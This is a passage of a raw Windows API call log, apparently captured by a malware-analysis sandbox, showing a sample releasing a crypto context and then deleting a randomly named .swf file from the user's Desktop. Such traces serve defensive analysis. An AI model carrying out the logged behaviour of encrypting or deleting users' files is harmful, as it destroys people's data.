dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0210.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0210.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0210.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0210.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0210.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0210.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0210.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0210.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0210.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0210.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0210.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0210.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0210.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0210.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0210.423] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0210.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0210.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0210.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0210.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0210.423] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0210.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0210.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0210.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0210.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0210.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0210.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0210.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0210.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0210.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0210.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0210.424] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0210.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0210.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0210.425] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0210.425] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.425] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0210.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0210.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0210.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0210.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0210.425] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0210.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0210.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0210.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0210.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0210.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0210.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0210.425] FreeLibrary (hLibModule=0x756e0000) returned 1 [0210.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0210.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0210.425] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0210.426] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0210.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0210.426] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0210.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0210.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0210.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0210.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0210.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0210.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0210.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0210.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0210.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0210.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0210.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0210.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0210.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0210.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0210.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0210.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0210.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0210.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0210.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0210.427] CloseHandle (hObject=0x2a0) returned 1 [0210.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0210.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0210.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0210.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0210.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0210.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0210.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0210.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0210.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0210.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0210.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0210.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0210.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0210.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0210.429] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0210.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0210.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0210.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0210.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0210.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0210.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0210.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0210.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0210.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0210.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0210.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0210.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0210.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0210.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0210.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0210.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0210.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0210.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0210.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0210.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0210.430] CloseHandle (hObject=0x2d0) returned 1 [0210.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0210.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0210.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0210.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0210.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0210.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0210.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0210.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0210.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0210.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0210.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0210.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0210.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0210.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0210.434] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0210.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0210.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0210.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0210.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0210.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0210.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0210.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0210.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0210.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0210.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0210.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0210.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0210.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0210.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0210.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0210.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0210.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0210.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0210.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0210.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0210.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0210.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0210.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0210.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0210.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0210.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0210.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0210.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0210.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0210.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0210.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0210.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0210.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0210.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0210.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0210.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0210.439] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0210.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0210.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0210.439] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0210.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0210.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0210.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0210.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0210.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0210.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0210.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0210.440] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/WaYoUsnM2UCIentbe.swf", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\WaYoUsnM2UCIentbe.swf", lpFilePart=0x8cedf4*="WaYoUsnM2UCIentbe.swf") returned 0x2d [0210.440] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\WaYoUsnM2UCIentbe.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\wayousnm2ucientbe.swf")) returned 0x20 [0210.440] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\WaYoUsnM2UCIentbe.swf", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80af5270, ftCreationTime.dwHighDateTime=0x1d5e375, ftLastAccessTime.dwLowDateTime=0xf113eec0, ftLastAccessTime.dwHighDateTime=0x1d5e746, ftLastWriteTime.dwLowDateTime=0xf113eec0, ftLastWriteTime.dwHighDateTime=0x1d5e746, nFileSizeHigh=0x0, nFileSizeLow=0x5963, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="WaYoUsnM2UCIentbe.swf", cAlternateFileName="WAYOUS~1.SWF")) returned 0xa876d0 [0210.440] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\WaYoUsnM2UCIentbe.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\wayousnm2ucientbe.swf")) returned 1 [0210.443] FindNextFileW (in: hFindFile=0xa876d0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80af5270, ftCreationTime.dwHighDateTime=0x1d5e375, ftLastAccessTime.dwLowDateTime=0xf113eec0, ftLastAccessTime.dwHighDateTime=0x1d5e746, ftLastWriteTime.dwLowDateTime=0xf113eec0, ftLastWriteTime.dwHighDateTime=0x1d5e746, nFileSizeHigh=0x0, nFileSizeLow=0x5963, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="WaYoUsnM2UCIentbe.swf", cAlternateFileName="WAYOUS~1.SWF")) returned 0 [0210.443] FindClose (in: hFindFile=0xa876d0 | out: hFindFile=0xa876d0) returned 1 [0210.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0210.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0210.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0210.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0210.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0210.443] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0210.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0210.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0210.443] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0210.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0210.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0210.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0210.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0210.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0210.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0210.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0210.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0210.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0210.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0210.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0210.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0210.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0210.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0210.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0210.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0210.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0210.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0210.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0210.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5c) returned 0x2e563a8 [0210.444] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/WaYoUsnM2UCIentbe.swf", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\WaYoUsnM2UCIentbe.swf", lpFilePart=0x8cf650*="WaYoUsnM2UCIentbe.swf") returned 0x2d [0210.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0210.444] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\WaYoUsnM2UCIentbe.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\wayousnm2ucientbe.swf")) returned 0xffffffff 